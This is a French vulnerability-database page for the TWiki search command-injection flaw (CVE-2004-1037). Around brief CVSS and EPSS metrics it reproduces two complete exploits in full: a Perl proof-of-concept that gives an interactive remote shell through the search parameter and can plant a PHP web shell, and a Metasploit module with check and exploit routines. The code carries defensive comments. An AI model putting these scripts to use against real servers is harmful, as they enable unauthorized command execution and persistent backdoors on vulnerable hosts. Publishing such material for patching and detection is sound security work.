Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 642
Date de publication : 2004-11-19 23h00 +00:00
Auteur : RoMaNSoFt
EDB Vérifié : Yes
#!/usr/bin/perl
# "tweaky.pl" v. 1.0 beta 2
#
# Proof of concept for TWiki vulnerability. Remote code execution
# Vuln discovered, researched and exploited by RoMaNSoFt <roman rs-labs com>
#
# Madrid, 30.Sep.2004.
require LWP::UserAgent;
use Getopt::Long;
### Default config
# All settings are package globals (the script runs without `use strict`);
# most of them can be overridden from the command line via GetOptions below.
$host = '';
$path = '/cgi-bin/twiki/search/Main/';   # path of the TWiki search CGI
$secure = 0;                             # 1 => use https://
$get = 0;
$post = 0;
$phpshellpath='';                        # when set, create_phpshell runs instead of pseudoshell
# Shell pipeline that writes a one-line PHP web shell to $phpshellpath (the
# path is appended in create_phpshell). Note for anyone writing a filter: the
# characters `<`, `>`, `?` and `&` never appear literally in this string -- they
# are produced at runtime by the embedded `perl -e 'print chr(...)'` calls -- so
# a rule that only looks for those characters would not see this payload.
$createphpshell = '(echo `perl -e \'print chr(60).chr(63)\'` ; echo \'$out = shell_exec($_GET["cmd"].
" 2\'`perl -e \'print chr(62).chr(38)\'`\'1");\' ; echo \'echo "\'`perl -e \'print chr(60)."pre".chr(62)."\\\\
$out".chr(60)."/pre".chr(62)\'`\'";\' ; echo `perl -e \'print chr(63).chr(62)\'`) | tee ';
$logfile = ''; # If empty, logging will be disabled
$prompt = "tweaky\$ ";
$useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)';  # default User-Agent sent with every request
$proxy = '';
$proxy_user = '';
$proxy_pass = '';
$basic_auth_user = '';
$basic_auth_pass = '';
$timeout = 30;                           # seconds, passed to LWP::UserAgent->timeout
$debug = 0;                              # 1 => run_it prints the raw response body
$init_command = 'uname -a ; id';         # first command, used as the vulnerability probe
$start_mark = 'AAAA';
$end_mark = 'BBBB';
# $pre_string terminates the single-quoted value the search CGI presumably
# wraps around the search term and opens a subshell; $post_string pipes the
# subshell's output through sed so each output line is bracketed by
# $start_mark ... $end_mark and then re-enters a quoted string so the server
# side quoting stays balanced. run_it recovers the bracketed lines from the
# HTML response with $delim_start/$delim_end.
$pre_string = 'nonexistantttt\' ; (';
$post_string = ') | sed \'s/\(.*\)/'.$start_mark.'\1'.$end_mark.'.txt/\' ; fgrep -i -l -- \'nonexistantttt';
# NOTE: the delimiters are computed here, before GetOptions runs, so
# --start_mark/--end_mark given on the command line do NOT change them
# (nor $post_string); only the defaults are ever used.
$delim_start = '<b>'.$start_mark;
$delim_end = $end_mark.'</b>';
print "Proof of concept for TWiki vulnerability. Remote code execution.\n";
print "(c) RoMaNSoFt, 2004. <roman\@rs-labs.com>\n\n";
### User-supplied config (read from the command-line)
$parsing_ok = GetOptions ('host=s' => \$host,
    'path=s' => \$path,
    'secure' => \$secure,
    'get' => \$get,
    'post' => \$post,
    'phpshellpath=s' => \$phpshellpath,
    'logfile=s' => \$logfile,
    'init_command=s' => \$init_command,
    'useragent=s' => \$useragent,
    'proxy=s' => \$proxy,
    'proxy_user=s' => \$proxy_user,
    'proxy_pass=s' => \$proxy_pass,
    'basic_auth_user=s' => \$basic_auth_user,
    'basic_auth_pass=s' => \$basic_auth_pass,
    'timeout=i' => \$timeout,
    'debug' => \$debug,
    'start_mark=s' => \$start_mark,
    'end_mark=s' => \$end_mark);
### Some basic checks
# banner() prints usage and exits, so each of these is fatal.
&banner unless ($parsing_ok);
if ($get and $post) {
    print "Choose one only method! (GET or POST)\n\n";
    &banner;
}
if (!($get or $post)) {
    # If not specified we prefer POST method
    $post = 1;
}
if (!$host) {
    print "You must specify a target hostname! (tip: --host <hostname>)\n\n" ;
    &banner;
}
# $host is concatenated as given; no validation of the hostname or path.
$url = ($secure ? 'https' : 'http') . "://" . $host . $path;
### Checking for a vulnerable TWiki
# The truthy second argument puts run_it in probe mode: nothing is printed
# or logged, and an empty response makes run_it die.
&run_it ($init_command, 'RS-Labs rlz!');
### Execute selected payload
if ($phpshellpath) {
    &create_phpshell;
    print "PHPShell created.";
} else {
    &pseudoshell;
}
### End
# Explicit exit so execution never falls through into the sub definitions.
exit(0);
### Create PHPShell
### Create PHPShell
# Appends the user-supplied $phpshellpath to the global $createphpshell
# pipeline (mutating the global) and sends it through run_it in probe mode,
# so nothing is printed; run_it dies if the response carries no marked output.
# Takes no arguments and returns nothing meaningful.
sub create_phpshell {
    $createphpshell .= $phpshellpath;
    &run_it($createphpshell, 'yeah!');
}
### Pseudo-shell
### Pseudo-shell
# Interactive loop: every line read from standard input is handed to run_it
# as a command. Ends on EOF (Ctrl-D) or on one of the four exit words, in
# which case the process exits with status 1.
# Takes no arguments; uses the globals $logfile, $prompt and $init_command.
sub pseudoshell {
    # Two-arg open with $logfile interpolated into the mode string: a path
    # beginning with '<', '>' or '|' would be misparsed. The three-arg form
    # open(LOGFILE, '>>', $logfile) avoids that. LOGFILE is a bareword global
    # handle that run_it also writes to. The return value is not checked.
    open(LOGFILE, ">>$logfile") if $logfile;
    # '-' as the filename opens standard input.
    open(STDINPUT, '-');
    print "Welcome to RoMaNSoFt's pseudo-interactive shell :-)\n[Type Ctrl-D or (bye, quit, exit, logout) to exit]\n
\n".$prompt.$init_command."\n";
    &run_it ($init_command);
    print $prompt;
    while (<STDINPUT>) {
        # chop removes the last character unconditionally (here the newline);
        # a final line without a trailing newline would lose its last character.
        chop;
        if ($_ eq "bye" or $_ eq "quit" or $_ eq "exit" or $_ eq "logout") {
            exit(1);
        }
        # Skip empty lines (a line consisting only of "0" is skipped as well).
        &run_it ($_) unless !$_;
        print "\n".$prompt;
    }
    close(STDINPUT);
    close(LOGFILE) if $logfile;
}
### Print banner and die
### Print banner and die
# Prints the usage text to STDOUT and exits with status 1. Called for every
# command-line error. Uses the global $path to show the default CGI path.
sub banner {
    print "Syntax: ./tweaky.pl --host=<host> [options]\n\n";
    print "Proxy options: --proxy=http://proxy:port --proxy_user=foo --proxy_pass=bar\n";
    print "Basic auth options: --basic_auth_user=foo --basic_auth_pass=bar\n";
    print "Secure HTTP (HTTPS): --secure\n";
    print "Path to CGI: --path=$path\n";
    print "Method: --get | --post\n";
    print "Enable logging: --logfile=/path/to/a/file\n";
    print "Create PHPShell: --phpshellpath=/path/to/phpshell\n";
    exit(1);
}
### Execute command via vulnerable CGI
### Execute command via vulnerable CGI
# run_it($command, $testing_vuln)
#   $command      - command string placed between $pre_string and $post_string
#                   and sent as the 'search' parameter.
#   $testing_vuln - truthy on the initial probe: output is neither printed
#                   nor logged, and an empty response is fatal.
# Returns nothing meaningful. Dies when the HTTP request fails or when a
# probe gets back no marked output.
# Reads the globals $url, $get, $post, $useragent, $timeout, $proxy,
# $proxy_user, $proxy_pass, $basic_auth_user, $basic_auth_pass, $pre_string,
# $post_string, $delim_start, $delim_end, $debug, $logfile, $prompt, $secure.
# Detection note: on the wire this is an ordinary GET or POST to the search
# script; the only indicator is a URL-encoded 'search' value containing shell
# metacharacters (single quote, semicolon, parentheses, pipe).
sub run_it {
    my ($command, $testing_vuln) = @_;
    my $req;
    # Indirect object syntax; LWP::UserAgent->new is the conventional form.
    my $ua = new LWP::UserAgent;
    $ua->agent($useragent);
    $ua->timeout($timeout);
    # Build CGI param and urlencode it
    my $search = $pre_string . $command . $post_string;
    # Percent-encodes every non-word character, i.e. everything outside [A-Za-z0-9_].
    $search =~ s/(\W)/"%" . unpack("H2", $1)/ge;
    # Case GET
    if ($get) {
        $req = HTTP::Request->new('GET', $url . "?scope=text&order=modified&search=$search");
    }
    # Case POST
    if ($post) {
        $req = new HTTP::Request POST => $url;
        $req->content_type('application/x-www-form-urlencoded');
        $req->content("scope=text&order=modified&search=$search");
    }
    # Proxy definition
    if ($proxy) {
        if ($secure) {
            # HTTPS request: proxy settings are handed over through the
            # environment (presumably read by the SSL backend LWP uses;
            # not verifiable from this file).
            $ENV{HTTPS_PROXY} = $proxy;
            $ENV{HTTPS_PROXY_USERNAME} = $proxy_user;
            $ENV{HTTPS_PROXY_PASSWORD} = $proxy_pass;
        } else {
            # HTTP request
            $ua->proxy(['http'] => $proxy);
            $req->proxy_authorization_basic($proxy_user, $proxy_pass);
        }
    }
    # Basic Authorization
    $req->authorization_basic($basic_auth_user, $basic_auth_pass) if ($basic_auth_user);
    # Launch request and parse results
    my $res = $ua->request($req);
    if ($res->is_success) {
        # LOGFILE is the bareword handle opened in pseudoshell.
        print LOGFILE "\n".$prompt.$command."\n" if ($logfile and !$testing_vuln);
        # @content is a package global (no `my`).
        @content = split("\n", $res->content);
        my $empty_response = 1;
        foreach $_ (@content) {
            # $delim_start/$delim_end are interpolated unescaped into the
            # pattern; marks containing regex metacharacters would change it
            # (\Q...\E would make them literal).
            my ($match) = ($_ =~ /$delim_start(.*)$delim_end/g);
            if ($debug) {
                print $_ . "\n";
            } else {
                # Truthiness test: an output line of "0" counts as no match.
                if ($match) {
                    $empty_response = 0;
                    print $match . "\n" unless ($testing_vuln);
                }
            }
            print LOGFILE $match . "\n" if ($match and $logfile and !$testing_vuln);
        }
        if ($empty_response) {
            if ($testing_vuln) {
                die "Sorry, exploit didn't work!\nPerhaps TWiki is patched or you supplied a wrong URL
(remember it should point to Twiki's search page).\n";
            } else {
                print "[Server issued an empty response. Perhaps you entered a wrong command?]\n";
            }
        }
    } else {
        die "Couldn't connect to server. Error message follows:\n" . $res->status_line . "\n";
    }
}
# milw0rm.com [2004-11-20]
Exploit Database EDB-ID : 16894
Date de publication : 2010-07-02 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: twiki_search.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Metasploit module for CVE-2004-1037: OS command injection through the
# 'search' parameter of TWiki's WebSearch script (see References below).
# Forensic note: `check` creates and then tries to delete a randomly named
# <name>.txt file under the Main web; if the delete step fails the file is
# left behind (a warning is printed) and is an indicator that the target
# was scanned with this module.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  # Module metadata. The only option is URI, the TWiki bin directory path,
  # which both check and exploit prepend to '/view/Main/...'.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'TWiki Search Function Arbitrary Command Execution',
      'Description' => %q{
This module exploits a vulnerability in the search component of TWiki.
By passing a 'search' parameter containing shell metacharacters to the
'WebSearch' script, an attacker can execute arbitrary OS commands.
      },
      'Author' =>
        [
          # Unknown - original discovery
          'jduck' # metasploit version
        ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision: 9671 $',
      'References' =>
        [
          [ 'CVE', '2004-1037' ],
          [ 'OSVDB', '11714' ],
          [ 'BID', '11674' ],
          [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ]
        ],
      'Privileged' => true, # web server context
      'Payload' =>
        {
          'DisableNops' => true,
          # The payload travels in a URL query string; spaces are excluded
          # (the probes in check use ${IFS} instead of spaces for the same reason).
          'BadChars' => ' ',
          'Space' => 1024,
        },
      'Platform' => [ 'unix' ],
      'Arch' => ARCH_CMD,
      'Targets' => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Oct 01 2004',
      'DefaultTarget' => 0))
    register_options(
      [
        OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
      ], self.class)
  end

  # Active check: injects a command that writes a random marker into a
  # randomly named .txt topic under Main, fetches that topic and looks for
  # the marker, then injects a second command to remove the file.
  # Returns Exploit::CheckCode::Vulnerable when the marker is read back,
  # Exploit::CheckCode::Safe on any failure; each request has a 25s timeout.
  def check
    content = rand_text_alphanumeric(16+rand(16))
    test_file = rand_text_alphanumeric(8+rand(8))
    cmd_base = datastore['URI'] + '/view/Main/WebSearch?search='
    test_url = datastore['URI'] + '/view/Main/' + test_file
    # first see if it already exists (it really shouldn't)
    res = send_request_raw({
      'uri' => test_url
    }, 25)
    if (not res) or (res.body.match(content))
      print_error("WARNING: The test file exists already!")
      return Exploit::CheckCode::Safe
    end
    # try to create it
    print_status("Attempting to create #{test_url} ...")
    search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'"
    res = send_request_raw({
      'uri' => cmd_base + Rex::Text.uri_encode(search)
    }, 25)
    if (not res) or (res.code != 200)
      return Exploit::CheckCode::Safe
    end
    # fetch the new topic; its body should contain the random marker if the
    # injected command ran
    res = send_request_raw({
      'uri' => test_url
    }, 25)
    if (not res) or (not res.body.match(content))
      return Exploit::CheckCode::Safe
    end
    # delete the tmp file
    print_status("Attempting to delete #{test_url} ...")
    search = rand_text_numeric(1+rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'"
    res = send_request_raw({
      'uri' => cmd_base + Rex::Text.uri_encode(search)
    }, 25)
    if (not res) or (res.code != 200)
      # Non-fatal: the target is still reported vulnerable, but the .txt
      # file remains on the server.
      print_error("WARNING: unable to remove test file (#{test_file})")
    end
    return Exploit::CheckCode::Vulnerable
  end

  # Sends a single GET to WebSearch with the encoded payload in 'search',
  # then hands off to the payload handler. Raises RuntimeError unless the
  # server answers with HTTP 200; a 200 only means the request was accepted,
  # not that the payload ran.
  def exploit
    search = rand_text_alphanumeric(1+rand(8))
    search << "';" + payload.encoded + ";#\'"
    query_str = datastore['URI'] + '/view/Main/WebSearch'
    query_str << '?search='
    query_str << Rex::Text.uri_encode(search)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => query_str,
    }, 25)
    if (res and res.code == 200)
      print_status("Successfully sent exploit request")
    else
      raise RuntimeError, "Error sending exploit request"
    end
    handler
  end
end
Products Mentioned
Configuration 0
Twiki>>Twiki >> Version 2003-02-01
Configuration 0
Gentoo>>Linux >> Version *
Références